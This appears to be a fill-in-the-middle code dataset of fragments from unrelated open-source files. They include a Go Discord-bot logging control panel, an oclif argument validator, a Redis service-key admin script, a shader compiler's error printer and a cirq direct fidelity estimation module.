saveHandler := web.ControllerPostHandler(HandleLogsCPSaveGeneral, cpGetHandler, ConfigFormData{}, "Updated logging config")
fullDeleteHandler := web.ControllerPostHandler(HandleLogsCPDelete, cpGetHandler, DeleteData{}, "Deleted a channel log")
msgDeleteHandler := web.APIHandler(HandleDeleteMessageJson)
logCPMux.Handle(pat.Post("/"), saveHandler)
logCPMux.Handle(pat.Post(""), saveHandler)
logCPMux.Handle(pat.Post("/fulldelete2"), fullDeleteHandler)
logCPMux.Handle(pat.Post("/msgdelete2"), msgDeleteHandler)
}
func HandleLogsCP(w http.ResponseWriter, r *http.Request) (web.TemplateData, error) {
ctx := r.Context()
g, tmpl := web.GetBaseCPContextData(ctx)
beforeID := 0
beforeStr := r.URL.Query().Get("before")
if beforeStr != "" {
beforeId64, err := strconv.ParseInt(beforeStr, 10, 32)
if err != nil {
tmpl.AddAlerts(web.ErrorAlert("Failed parsing before id"))
}
beforeID = int(beforeId64)
} else {
tmpl["FirstPage"] = true
}
afterID := 0
afterStr := r.URL.Query().Get("after")
if afterStr != "" {
id64, err := strconv.ParseInt(afterStr, 10, 32)
if err != nil {
tmpl.AddAlerts(web.ErrorAlert("Failed parsing before id"))
}
afterID = int(id64)
tmpl["FirstPage"] = false
}
serverLogs, err := GetGuilLogs(ctx, g.ID, beforeID, afterID, 20)
web.CheckErr(tmpl, err, "Failed retrieving logs", web.CtxLogger(ctx).Error)
if err == nil {
tmpl["Logs"] = serverLogs
if len(serverLogs) > 0 {
tmpl["Oldest"] = serverLogs[len(serverLogs)-1].ID
tmpl["Newest"] = serverLogs[0].ID
}
}
general, err := GetConfig(common.PQ, ctx, g.ID)
if err != nil {
return nil, err
}
tmpl["Config"] = general
// dealing with legacy code is a pain, gah
// so way back i didn't know about arrays in postgres, so i made the blacklisted channels field a single TEXT field, with a comma seperator
blacklistedChannels := make([]int64, 0, 10)
split := strings.Split(general.BlacklistedChannels.String, ",")
for _, v := range split {
i, err := strconv.ParseInt(v, 10, 64)
if i != 0 && err == nil {
blacklistedChannels = append(blacklistedChannels, i)
}
}
tmpl["ConfBlacklistedChannels"] = blacklistedChannels
return tmpl, nil
}
func HandleLogsCPSaveGeneral(w http.ResponseWriter, r *http.Request) (web.TemplateData, error) {
ctx := r.Context()
g, tmpl := web.GetBaseCPContextData(ctx)
form := ctx.Value(common.ContextKeyParsedForm).(*ConfigFormData)
config := &models.GuildLoggingConfig{
GuildID: g.ID,
NicknameLoggingEnabled: null.BoolFrom(form.NicknameLoggingEnabled),
UsernameLoggingEnabled: null.BoolFrom(form.UsernameLoggingEnabled),
BlacklistedChannels: null.StringFrom(strings.Join(form.BlacklistedChannels, ",")),
EveryoneCanViewDeleted: null.BoolFrom(form.EveryoneCanViewDeleted),
ManageMessagesCanViewDeleted: null.BoolFrom(form.ManageMessagesCanViewDeleted),
MessageLogsAllowedRoles: form.MessageLogsAllowedRoles,
}
err := config.UpsertG(ctx, true, []string{"guild_id"}, boil.Infer(), boil.Infer())
if err == nil {
logger.Println("evicting")
bot.EvictGSCache(g.ID, CacheKeyConfig)
}
return tmpl, err
}
func HandleLogsCPDelete(w http.ResponseWriter, r *http.Request) (web.TemplateData, error) {
ctx := r.Context()
g, tmpl := web.GetBaseCPContextData(ctx)
data := ctx.Value(common.ContextKeyParsedForm).(*DeleteData)
if data.ID == 0 {
return tmpl, errors.New("ID is blank!")
}
_, err := models.MessageLogs2s(
models.MessageLogs2Where.ID.EQ(int(data.ID)),
models.MessageLogs2Where.GuildID.EQ(g.ID),
).DeleteAll(r.Context(), common.PQ)
if err != nil {
return tmpl, err
}
// for legacy setups
// _, err = models.Messages(models.MessageWhere.MessageLogID.EQ(null.IntFrom(int(data.ID)))).DeleteAll(ctx, common.PQ)
return tmpl, err
}
func CheckCanAccessLogs(w http.ResponseWriter, r *http.Request, config *models.GuildLoggingConfig) bool {
_, tmpl := web.GetBaseCPContextData(r.Context())
isAdmin, _ := web.IsAdminRequest(r.Context(), r)
// check if were allowed access to logs on this server
if isAdmin || len(config.MessageLogsAllowedRoles) < 1 {
return true
}
member := web.ContextMember(r.Context())
if member == nil {
tmpl.AddAlerts(web.ErrorAlert("This server has restricted log access to certain roles, either you're not logged in or not on this server."))
return false
}
if !common.ContainsInt64SliceOneOf(member.Roles, config.MessageLogsAllowedRoles) {
tmpl.AddAlerts(web.ErrorAlert("This server has restricted log access to certain roles, you don't have any of them."))
return false
}
return true
}
type ctxKey int
const (
ctxKeyLogs ctxKey = iota
ctxKeyMessages
ctxKeyConfig
)
func | (inner web.CustomHandlerFunc, legacy bool) web.CustomHandlerFunc {
return func(w http.ResponseWriter, r *http.Request) interface{} {
g, tmpl := web.GetBaseCPContextData(r.Context())
idString := pat.Param(r, "id")
parsed, err := strconv.ParseInt(idString, 10, 64)
if web.CheckErr(tmpl, err, "Thats's not a real log id", nil) {
return tmpl
}
config, err := GetConfig(common.PQ, r.Context(), g.ID)
if web.CheckErr(tmpl, err, "Error retrieving config for this server", web.CtxLogger(r.Context()).Error) {
return tmpl
}
if !CheckCanAccessLogs(w, r, config) {
return tmpl
}
sm := SearchModeLegacy
if !legacy {
sm = SearchModeNew
}
// retrieve logs
msgLogs, messages, err := GetChannelLogs(r.Context(), parsed, g.ID, sm)
if web.CheckErr(tmpl, err, "Failed retrieving message logs", web.CtxLogger(r.Context()).Error) {
return tmpl
}
if msgLogs.GuildID != g.ID {
return tmpl.AddAlerts(web.ErrorAlert("Couldn't find the logs im so sorry please dont hurt me i have a family D:"))
}
ctx := r.Context()
ctx = context.WithValue(ctx, ctxKeyLogs, msgLogs)
ctx = context.WithValue(ctx, ctxKeyMessages, messages)
ctx = context.WithValue(ctx, ctxKeyConfig, config)
return inner(w, r.WithContext(ctx))
}
}
type MessageView struct {
Model *models.Messages2
Color string
Timestamp string
}
func HandleLogsHTML(w http.ResponseWriter, r *http.Request) interface{} {
g, tmpl := web.GetBaseCPContextData(r.Context())
logs := r.Context().Value(ctxKeyLogs).(*models.MessageLogs2)
messages := r.Context().Value(ctxKeyMessages).([]*models.Messages2)
config := r.Context().Value(ctxKeyConfig).(*models.GuildLoggingConfig)
// check if were allowed to view deleted messages
canViewDeleted, _ := web.IsAdminRequest(r.Context(), r)
if config.EveryoneCanViewDeleted.Bool {
canViewDeleted = true
} else if config.ManageMessagesCanViewDeleted.Bool && !canViewDeleted {
canViewDeleted = web.HasPermissionCTX(r.Context(), discordgo.PermissionManageMessages)
}
tmpl["CanViewDeleted"] = canViewDeleted
// Convert into views with formatted dates and colors
const TimeFormat = "2006 Jan 02 15:04"
messageViews := make([]*MessageView, len(messages))
for i, _ := range messageViews {
m := messages[i]
v := &MessageView{
Model: m,
Timestamp: m.CreatedAt.Format(TimeFormat),
}
messageViews[i] = v
}
SetMessageLogsColors(g.ID, messageViews)
tmpl["Logs"] = logs
tmpl["Messages"] = messageViews
return tmpl
}
func SetMessageLogsColors(guildID int64, views []*MessageView) {
users := make([]int64, 0, 50)
for _, v := range views {
if !common.ContainsInt64Slice(users, v.Model.AuthorID) {
users = append(users, v.Model.AuthorID)
}
}
roleColors, _ := botrest.GetMemberColors(guildID, users...)
if roleColors == nil {
return
}
for _, v := range views {
strAuthorID := strconv.FormatInt(v.Model.AuthorID, 10)
color := roleColors[strAuthorID]
if color != 0 {
v.Color = strconv.FormatInt(int64(color), 16)
}
}
}
func HandleDeleteMessageJson(w http.ResponseWriter, r *http.Request) interface{} {
g, _ := web.GetBaseCPContextData(r.Context())
logsId := r.FormValue("LogID")
msgID := r.FormValue("MessageID")
if logsId == "" || msgID == "" {
return web.NewPublicError("Empty id")
}
parsedLogsID, _ := strconv.ParseInt(logsId, 10, 64)
_, err := models.MessageLogs2s(
models.MessageLogs2Where.ID.EQ(int(parsedLogsID)),
models.MessageLogs2Where.GuildID.EQ(g.ID),
).OneG(r.Context())
if err != nil {
return err
}
parsedMsgID, _ := strconv.ParseInt(msgID, 10, 64)
_, err = models.Messages2s(
models.Messages2Where.ID.EQ(parsedMsgID),
models.Messages2Where.GuildID.EQ(g.ID)).UpdateAllG(
r.Context(), models.M{"deleted": true})
if err != nil {
return err
}
user := r.Context().Value(common.ContextKeyUser).(*discordgo.User)
common.AddCPLogEntry(user, g.ID, "Deleted a message from log #"+logsId)
return err
}
var _ web.PluginWithServerHomeWidget = (*Plugin)(nil)
func (p *Plugin) LoadServerHomeWidget(w http.ResponseWriter, r *http.Request) (web.TemplateData, error) {
activeGuild, templateData := web.GetBaseCPContextData(r.Context())
templateData["WidgetTitle"] = "Logging"
templateData["SettingsPath"] = "/logging/"
config, err := GetConfig(common.PQ, r.Context(), activeGuild.ID)
if err != nil {
return templateData, err
}
nBlacklistedChannels := 0
if len(config.BlacklistedChannels.String) > 0 {
split := strings.Split(config.BlacklistedChannels.String, ",")
nBlacklistedChannels = len(split)
}
format := `<ul>
<li>Username logging: %s</li>
<li>Nickname logging: %s</li>
<li>Blacklisted channels from creating message logs: <code>%d</code></li>
</ul>`
templateData["WidgetEnabled"] = true
templateData["WidgetBody"] = template.HTML(fmt.Sprintf(format, web.EnabledDisabledSpanStatus(config.UsernameLoggingEnabled.Bool),
web.EnabledDisabledSpanStatus(config.NicknameLoggingEnabled.Bool), nBlacklistedChannels))
return templateData, nil
}
| LogFetchMW |
validate.ts | import {CLIError} from '@oclif/errors'
import {Arg} from './args'
import {
InvalidArgsSpecError,
RequiredArgsError,
RequiredFlagError,
UnexpectedArgsError,
} from './errors'
import {ParserInput, ParserOutput} from './parse'
import {IFlag} from './flags'
export function validate(parse: {
input: ParserInput;
output: ParserOutput<any, any>;
}) {
function | () {
const maxArgs = parse.input.args.length
if (parse.input.strict && parse.output.argv.length > maxArgs) {
const extras = parse.output.argv.slice(maxArgs)
throw new UnexpectedArgsError({parse, args: extras})
}
const missingRequiredArgs: Arg<any>[] = []
let hasOptional = false
parse.input.args.forEach((arg, index) => {
if (!arg.required) {
hasOptional = true
} else if (hasOptional) {
// (required arg) check whether an optional has occurred before
// optionals should follow required, not before
throw new InvalidArgsSpecError({parse, args: parse.input.args})
}
if (arg.required) {
if (!parse.output.argv[index] && parse.output.argv[index] as any as number !== 0) {
missingRequiredArgs.push(arg)
}
}
})
if (missingRequiredArgs.length > 0) {
throw new RequiredArgsError({parse, args: missingRequiredArgs})
}
}
function validateAcrossFlags(flag: IFlag<any>) {
const intersection = Object.entries(parse.input.flags)
.map(entry => entry[0]) // array of flag names
.filter(flagName => parse.output.flags[flagName] !== undefined) // with values
.filter(flagName => flag.exactlyOne && flag.exactlyOne.includes(flagName)) // and in the exactlyOne list
if (intersection.length === 0) {
// the command's exactlyOne may or may not include itself, so we'll use Set to add + de-dupe
throw new CLIError(`Exactly one of the following must be provided: ${[
...new Set(...flag.exactlyOne || [], flag.name),
].join(',')}`)
}
}
function validateFlags() {
for (const [name, flag] of Object.entries(parse.input.flags)) {
if (parse.output.flags[name] !== undefined) {
for (const also of flag.dependsOn || []) {
if (!parse.output.flags[also]) {
throw new CLIError(
`--${also}= must also be provided when using --${name}=`,
)
}
}
for (const also of flag.exclusive || []) {
// do not enforce exclusivity for flags that were defaulted
if (
parse.output.metadata.flags[also] &&
parse.output.metadata.flags[also].setFromDefault
)
continue
if (
parse.output.metadata.flags[name] &&
parse.output.metadata.flags[name].setFromDefault
)
continue
if (parse.output.flags[also]) {
throw new CLIError(
`--${also}= cannot also be provided when using --${name}=`,
)
}
}
for (const also of flag.exactlyOne || []) {
if (also !== name && parse.output.flags[also]) {
throw new CLIError(
`--${also}= cannot also be provided when using --${name}=`,
)
}
}
} else if (flag.required) {
throw new RequiredFlagError({parse, flag})
} else if (flag.exactlyOne && flag.exactlyOne.length > 0) {
validateAcrossFlags(flag)
}
}
}
validateArgs()
validateFlags()
}
| validateArgs |
services.py | #!/usr/bin/env python3
import redis
import argparse
import hashlib
from getpass import getpass
r = redis.StrictRedis(host="localhost", port=6379)
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--add', action='store_true', help='Adds a service')
group.add_argument('--check', action='store_true', help='Retrieve and print service details')
group.add_argument('--delete', action='store_true', help='Delete a service entry')
group.add_argument('--update', action='store_true', help='Update a service entry')
group.add_argument('--list', action='store_true', help='List all users')
group.add_argument('--stats', action='store_true', help='Statistics for all users')
parser.add_argument('service', nargs='?', default=None, type=str, help='Service username')
args = parser.parse_args()
if not args.service and not (args.list or args.stats):
from sys import exit
parser.print_help()
exit(1)
def hash_key(x: str):
m = hashlib.blake2b()
m.update(x.encode("utf-8"))
return m.digest()
def exists(key: str):
existing = r.exists(f"service:{key}") and r.sismember('services', key)
if not existing:
print(f"{key} not found")
else:
print(f"{key} exists")
return existing
def existing_users():
return [l.decode("utf-8") for l in r.smembers('services')]
def interactive_add():
public = "N/A"
public_opts = ["Y", "N"]
while public not in public_opts:
public = input("Public information? (Y/N): ")
display = input("Display name: ")
website = input("Website: ")
api_key = None
while not api_key:
api_key = getpass("API Key (hidden, will be hashed): ")
options = {
"public": public,
"display": display,
"website": website,
"api_key": hash_key(api_key),
"precache": 0,
"ondemand": 0
}
return options
def interactive_update():
public = "N/A"
public_opts = ["Y", "N", ""]
while public not in public_opts:
public = input("Public information? (Y/N): ")
display = input("Display name: ")
website = input("Website: ")
api_key = getpass("API Key (hidden, will be hashed): ")
options = dict()
if public:
options["public"] = public
if display:
options["display"] = display
if website:
options["website"] = website
if api_key:
options["api_key"] = hash_key(api_key)
return options
def display(user):
options = r.hgetall(f"service:{user}")
options = {k.decode("utf-8"): v for k,v in options.items()}
options = {k: v if k=="api_key" else v.decode("utf-8") for k,v in options.items()}
print(options)
def add(user):
print("Creating new entry.")
options = interactive_add()
r.hmset(f"service:{user}", options)
r.sadd("services", user)
print(f"User {user} created:")
display(user)
def update(user):
print("Updating entry. Leave a field blank to skip.")
options = interactive_update()
if options:
r.hmset(f"service:{user}", options)
print(f"User {user} updated:")
else:
print(f"No changes to {user}:")
display(user)
def delete(user):
print("Deleting entry.")
r.delete(f"service:{user}")
r.srem('services', user)
user_exists = exists(user)
if user_exists:
print("Failure in deleting")
else:
print("Deleting successfull")
def statistics(users):
for user in users:
stats = r.hgetall(f"service:{user}")
stats = {k.decode("utf-8"): v for k,v in stats.items()}
stats = {k: v if k=="api_key" else v.decode("utf-8") for k,v in stats.items()}
print(user)
print(f"\t{'PUBLIC' if stats['public']=='Y' else 'PRIVATE'}\n"
f"\tprecache: {stats.get('precache') or 0}"
f"\tondemand: {stats.get('ondemand') or 0}" | def main():
if args.list:
print("Services in database:\n", existing_users())
elif args.stats:
statistics(existing_users())
else:
user = args.service
user_exists = exists(user)
if not user_exists:
if args.add:
add(user)
else:
print("Services in database:\n", existing_users())
else:
if args.check:
display(user)
elif args.delete:
delete(user)
elif args.update:
update(user)
else:
NotImplementedError
if __name__ == '__main__':
main() | )
|
rest_API_client.py | # you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = 'Giuliana Carullo'
__copyright__ = "Copyright (c) 2017, Intel Research and Development Ireland Ltd."
__license__ = "Apache 2.0"
__maintainer__ = "Giuliana Carullo"
__email__ = "[email protected]"
__status__ = "Development"
import requests
import json
json_recipe = {
"name": 'avg_test',
"description": 'test workload',
"resourceURI": '/avg-test',
"exec": 'avg_test',
"exec_type": 'docker',
"category": {
"cpu": 'low',
"memory": 'low',
"disk": 'low',
"network": 'low',
"inclinometer": False,
"temperature": False,
"jammer": False,
"location": False,
"battery level": False,
"door sensor": False,
"pump sensor": False,
"accelerometer": False,
"humidity": False,
"air_pressure": False,
"ir_motion": False
}
}
# "ts_to":'1522144965',
# "ts_from":'1522144953',
json_internal = {
"id": 'avg_test',
"ts_to": '1522144965',
"ts_from": '1522144953',
"analysis_id": '',
}
headers = {'Content-type': 'application/json', 'Accept': 'text/json'}
# data=json.dumps(payload)
url = 'http://localhost:46020/mf2c/optimal'
res = requests.post(url, json=json_recipe, headers=headers)
if res.ok:
print 'Optimal Done'
json_data = json.loads(res.text)
print json_data
headers = {'Content-type': 'application/json', 'Accept': 'text/json'}
url = 'http://localhost:46020/mf2c/analyse'
res = requests.post(url, json=json_internal, headers=headers)
if res.ok:
print 'Analysis Done'
print ('Received: {}'.format(res.text))
json_data = json.loads(res.text)
json_internal = json_data
print json_data
url = 'http://localhost:46020/mf2c/refine'
res = requests.post(url, json=json_internal, headers=headers)
if res.ok:
print 'Refine recipe Done'
print ('Received: {}'.format(res.text))
json_data = json.loads(res.text)
print json_data | # Copyright (c) 2017, Intel Research and Development Ireland Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); |
|
main.rs | extern crate xshade;
extern crate getopts;
use getopts::Options;
use std::env;
use xshade::*;
mod file_resolver;
fn get_span_line(lines: &Vec<&str>, span: Span) -> String {
lines[span.line - 1].to_owned()
}
fn create_span_marker(span: Span) -> String {
let mut marker = String::new();
for i in 0..span.column - 1 {
marker.push_str(" ");
}
for i in 0..span.length {
marker.push_str("^");
}
marker
}
fn create_path_with_span(path: &str, span: Span) -> String {
let mut p = String::new();
p.push_str(path);
p.push_str(":");
p.push_str(&span.line.to_string());
p.push_str(":");
p.push_str(&span.column.to_string());
p
}
fn prefix(line: &str, indent: usize, content: &str) -> String {
let mut l = String::new();
l.push_str(" ");
for i in 0..indent - content.len() {
l.push_str(" ");
}
l.push_str(content);
l.push_str(" | ");
l.push_str(line);
l
}
fn single_span_error(line: &str, span: Span, path: &str, top: String, bottom: String) {
let marker = create_span_marker(span);
let indent = span.line.to_string().len();
println!("{}", top);
println!("error:");
println!("{}", path);
println!("{}", prefix(&line, indent, &span.line.to_string()));
println!("{}", prefix(&marker, indent, ""));
println!("{}", bottom);
}
pub fn main() {
let args: Vec<String> = env::args().collect();
let program = args[0].clone();
let module_path = args[1].to_string();
let file_resolver = file_resolver::FileResolver::new();
let mut compiler = Compiler::new(Box::new(file_resolver));
match compiler.compile_module(&module_path) {
Ok(module) => | ,
Err(error) => {
println!("{:#?}", error);
}
}
} | {
if let Some(error) = module.get_error() {
let source = module.get_source();
let lines: Vec<&str> = source.lines().collect();
match error.get_kind() {
&CompileErrorKind::TypeError(ref type_error) => {
let path = create_path_with_span(module.get_path(), type_error.get_span());
match type_error.get_kind() {
&TypeErrorKind::TypeNotFound(ref type_name) => {
let span = type_error.get_span();
let line = get_span_line(&lines, span);
single_span_error(&line, span, &path,
format!("error: Type not found:"),
format!("Type `{}` not found in current or any parent scope.", type_name));
}
&TypeErrorKind::TypeHasNoMember => {
let span = type_error.get_span();
let line = get_span_line(&lines, span);
single_span_error(&line, span, &path,
format!("error: Type has no members:"),
format!("Type `{{}}` has no members."));
}
&TypeErrorKind::IncompatibleTypes(left, right) => {
let left_line = get_span_line(&lines, left);
let right_line = get_span_line(&lines, right);
let left_marker = create_span_marker(left);
let right_marker = create_span_marker(right);
let indent = right.line.to_string().len();
println!("");
println!("error: Incompatible Types:");
println!("{}", path);
println!("{}", prefix(&left_line, indent, &left.line.to_string()));
println!("{}", prefix(&left_marker, indent, ""));
println!("{}", prefix(&right_line, indent, &right.line.to_string()));
println!("{}", prefix(&right_marker, indent, ""));
println!("Cannot use operator `{{}}` on type `{{}}` and `{{}}`.");
}
_ => println!("{:#?}", error),
}
},
_ => println!("{:#?}", error),
}
} else {
println!("{:#?}", module);
}
} |
utilities.go | // Copyright 2016-2020, Pulumi Corporation.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package model
import (
"sort"
"github.com/hashicorp/hcl/v2"
"github.com/hashicorp/hcl/v2/hclsyntax"
"github.com/pulumi/pulumi/pkg/v2/codegen/hcl2/syntax"
)
func syntaxOrNone(node hclsyntax.Node) hclsyntax.Node |
// SourceOrderLess returns true if the first range precedes the second when ordered by source position. Positions are
// ordered first by filename, then by byte offset.
func SourceOrderLess(a, b hcl.Range) bool {
return a.Filename < b.Filename || a.Start.Byte < b.Start.Byte
}
// SourceOrderBody sorts the contents of an HCL2 body in source order.
func SourceOrderBody(body *hclsyntax.Body) []hclsyntax.Node {
items := make([]hclsyntax.Node, 0, len(body.Attributes)+len(body.Blocks))
for _, attr := range body.Attributes {
items = append(items, attr)
}
for _, block := range body.Blocks {
items = append(items, block)
}
sort.Slice(items, func(i, j int) bool {
return SourceOrderLess(items[i].Range(), items[j].Range())
})
return items
}
| {
if node == nil {
return syntax.None
}
return node
} |
form_extend_test.go | package widget
import (
"testing"
"fyne.io/fyne/test"
"github.com/stretchr/testify/assert"
)
type extendedForm struct {
Form
}
func | (t *testing.T) {
form := &extendedForm{}
form.ExtendBaseWidget(form)
form.Items = []*FormItem{{Text: "test1", Widget: NewEntry()}}
assert.NotNil(t, test.WidgetRenderer(form))
assert.Equal(t, 2, len(form.itemGrid.Objects))
form.Append("test2", NewEntry())
assert.Equal(t, 4, len(form.itemGrid.Objects))
}
func TestForm_Extended_Append(t *testing.T) {
form := &extendedForm{}
form.ExtendBaseWidget(form)
form.Items = []*FormItem{{Text: "test1", Widget: NewEntry()}}
assert.Equal(t, 1, len(form.Items))
form.Append("test2", NewEntry())
assert.True(t, len(form.Items) == 2)
item := &FormItem{Text: "test3", Widget: NewEntry()}
form.AppendItem(item)
assert.True(t, len(form.Items) == 3)
assert.Equal(t, item, form.Items[2])
}
| TestForm_Extended_CreateRenderer |
rest.js | const res = await axios.get(`http://localhost:1337/${url}`);
return res.data;
} | import axios from "axios";
export default async function rest(url) { |
|
direct_fidelity_estimation.py | """Implements direct fidelity estimation.
Fidelity between the desired pure state rho and the actual state sigma is
defined as:
F(rho, sigma) = Tr (rho sigma)
It is a unit-less measurement between 0.0 and 1.0. The following two papers
independently described a faster way to estimate its value:
Direct Fidelity Estimation from Few Pauli Measurements
https://arxiv.org/abs/1104.4695
Practical characterization of quantum devices without tomography
https://arxiv.org/abs/1104.3835
This code implements the algorithm proposed for an example circuit (defined in
the function build_circuit()) and a noise (defines in the variable noise).
"""
from typing import cast, List, Optional, Tuple
import argparse
import asyncio
from dataclasses import dataclass
import itertools
import random
import sys
import numpy as np
import cirq
def build_circuit() -> Tuple[cirq.Circuit, List[cirq.Qid]]:
# Builds an arbitrary circuit to test. Do not include a measurement gate.
# The circuit need not be Clifford, but if it is, simulations will be
# faster.
qubits: List[cirq.Qid] = cast(List[cirq.Qid], cirq.LineQubit.range(3))
circuit: cirq.Circuit = cirq.Circuit(cirq.CNOT(qubits[0], qubits[2]),
cirq.Z(qubits[0]), cirq.H(qubits[2]),
cirq.CNOT(qubits[2], qubits[1]),
cirq.X(qubits[0]), cirq.X(qubits[1]),
cirq.CNOT(qubits[0], qubits[2]))
print('Circuit used:')
print(circuit)
return circuit, qubits
def compute_characteristic_function(circuit: cirq.Circuit,
pauli_string: cirq.PauliString,
qubits: List[cirq.Qid],
density_matrix: np.ndarray):
n_qubits = len(qubits)
d = 2**n_qubits
qubit_map = dict(zip(qubits, range(n_qubits)))
# rho_i or sigma_i in https://arxiv.org/abs/1104.3835
trace = pauli_string.expectation_from_density_matrix(
density_matrix, qubit_map)
assert np.isclose(trace.imag, 0.0, atol=1e-6)
trace = trace.real
prob = trace * trace / d # Pr(i) in https://arxiv.org/abs/1104.3835
return trace, prob
async def estimate_characteristic_function(circuit: cirq.Circuit,
pauli_string: cirq.PauliString,
qubits: List[cirq.Qid],
sampler: cirq.Sampler,
samples_per_term: int):
"""
Estimates the characteristic function using a (noisy) circuit simulator by
sampling the results.
Args:
circuit: The circuit to run the simulation on.
pauli_string: The Pauli string.
qubits: The list of qubits.
sampler: Either a noisy simulator or an engine.
samples_per_term: An integer greater than 0, the number of samples.
Returns:
The estimated characteristic function.
"""
p = cirq.PauliSumCollector(circuit=circuit,
observable=pauli_string,
samples_per_term=samples_per_term)
await p.collect_async(sampler=sampler)
sigma_i = p.estimated_energy()
assert np.isclose(sigma_i.imag, 0.0, atol=1e-6)
sigma_i = sigma_i.real
return sigma_i
def _randomly_sample_from_stabilizer_bases(
stabilizer_basis: List[cirq.DensePauliString],
n_measured_operators: int, n_qubits: int):
"""
Given a stabilizer basis, randomly creates Pauli states by including the
basis vector or not.
Args:
stabilizer_basis: A list of Pauli strings that is the stabilizer basis
to sample from.
n_measured_operators: The total number of Pauli measurements, or None to
explore each Pauli state once.
n_qubits: An integer that is the number of qubits.
Returns:
A list of Pauli strings that is the Pauli states built.
"""
dense_pauli_strings = []
for _ in range(n_measured_operators):
# Build the Pauli string as a random sample of the basis elements.
dense_pauli_string = cirq.DensePauliString.eye(n_qubits)
for stabilizer in stabilizer_basis:
if np.random.randint(2) == 1:
dense_pauli_string *= stabilizer
dense_pauli_strings.append(dense_pauli_string)
return dense_pauli_strings
def _enumerate_all_from_stabilizer_bases(
stabilizer_basis: List[cirq.DensePauliString], n_qubits: int):
"""
Given a stabilizer basis, creates the exhaustive list of Pauli states that
are spanned by the basis.
Args:
stabilizer_basis: A list of Pauli strings that is the stabilizer basis
to build all the Pauli strings.
n_qubits: An integer that is the number of qubits.
Returns:
A list of Pauli strings that is the Pauli states built.
"""
dense_pauli_strings = []
for coefficients in itertools.product([False, True], repeat=n_qubits):
dense_pauli_string = cirq.DensePauliString.eye(n_qubits)
for (keep, stabilizer) in zip(coefficients, stabilizer_basis):
if keep:
dense_pauli_string *= stabilizer
dense_pauli_strings.append(dense_pauli_string)
return dense_pauli_strings
@dataclass
class PauliTrace:
|
def _estimate_pauli_traces_clifford(n_qubits: int,
clifford_state: cirq.CliffordState,
n_measured_operators: Optional[int]
) -> List[PauliTrace]:
"""
Estimates the Pauli traces in case the circuit is Clifford. When we have a
Clifford circuit, there are 2**n Pauli traces that have probability 1/2**n
and all the other traces have probability 0. In addition, there is a fast
way to compute find out what the traces are. See the documentation of
cirq.CliffordState for more detail. This function uses the speedup to sample
the Pauli states with non-zero probability.
Args:
n_qubits: An integer that is the number of qubits.
clifford_state: The basis of the Pauli states with non-zero probability.
n_measured_operators: The total number of Pauli measurements, or None to
explore each Pauli state once.
Returns:
A list of Pauli states (represented as tuples of Pauli string, rho_i,
and probability.
"""
# When the circuit consists of Clifford gates only, we can sample the
# Pauli states more efficiently as described on page 4 of:
# https://arxiv.org/abs/1104.4695
d = 2**n_qubits
# The stabilizers_basis variable only contains basis vectors. For
# example, if we have n=3 qubits, then we should have 2**n=8 Pauli
# states that we can sample, but the basis will still have 3 entries. We
# must flip a coin for each, whether or not to include them.
stabilizer_basis: List[cirq.DensePauliString] = clifford_state.stabilizers()
if n_measured_operators is not None:
dense_pauli_strings = _randomly_sample_from_stabilizer_bases(
stabilizer_basis, n_measured_operators, n_qubits)
assert len(dense_pauli_strings) == n_measured_operators
else:
dense_pauli_strings = _enumerate_all_from_stabilizer_bases(
stabilizer_basis, n_qubits)
assert len(dense_pauli_strings) == 2**n_qubits
pauli_traces: List[PauliTrace] = []
for dense_pauli_string in dense_pauli_strings:
# The code below is equivalent to calling
# clifford_state.wave_function() and then calling
# compute_characteristic_function() on the results (albeit with a
# wave function instead of a density matrix). It is, however,
# unncessary to do so. Instead we directly obtain the scalar rho_i.
rho_i = dense_pauli_string.coefficient
assert np.isclose(rho_i.imag, 0.0, atol=1e-6)
rho_i = rho_i.real
dense_pauli_string *= rho_i
assert np.isclose(abs(rho_i), 1.0, atol=1e-6)
Pr_i = 1.0 / d
pauli_traces.append(
PauliTrace(P_i=dense_pauli_string.sparse(), rho_i=rho_i, Pr_i=Pr_i))
return pauli_traces
def _estimate_pauli_traces_general(qubits: List[cirq.Qid],
circuit: cirq.Circuit,
n_measured_operators: Optional[int]
) -> List[PauliTrace]:
"""
Estimates the Pauli traces in case the circuit is not Clifford. In this case
we cannot use the speedup implemented in the function
_estimate_pauli_traces_clifford() above, and so do a slow, density matrix
simulation.
Args:
qubits: The list of qubits.
circuit: The (non Clifford) circuit.
n_measured_operators: The total number of Pauli measurements, or None to
explore each Pauli state once.
Returns:
A list of Pauli states (represented as tuples of Pauli string, rho_i,
and probability.
"""
n_qubits = len(qubits)
dense_simulator = cirq.DensityMatrixSimulator()
# rho in https://arxiv.org/abs/1104.3835
clean_density_matrix = cast(
cirq.DensityMatrixTrialResult,
dense_simulator.simulate(circuit)).final_density_matrix
all_operators = itertools.product([cirq.I, cirq.X, cirq.Y, cirq.Z],
repeat=n_qubits)
if n_measured_operators is not None:
dense_operators = random.sample(tuple(all_operators),
n_measured_operators)
else:
dense_operators = list(all_operators)
pauli_traces: List[PauliTrace] = []
for P_i in dense_operators:
pauli_string = cirq.PauliString(dict(zip(qubits, P_i)))
rho_i, Pr_i = compute_characteristic_function(circuit, pauli_string,
qubits,
clean_density_matrix)
pauli_traces.append(PauliTrace(P_i=pauli_string, rho_i=rho_i,
Pr_i=Pr_i))
return pauli_traces
@dataclass
class TrialResult:
"""
Contains the results of a trial, either by simulator or actual run
"""
# The Pauli trace that was measured
pauli_trace: PauliTrace
# Coefficient of the measured/simulated pure state expanded in the Pauli
# basis scaled by sqrt(dim H), formally defined at bottom of left column of
# second page of https://arxiv.org/abs/1104.3835
sigma_i: float
@dataclass
class DFEIntermediateResult:
"""
A container for the various debug and run data from calling the function
direct_fidelity_estimation(). This is useful when running a long-computation
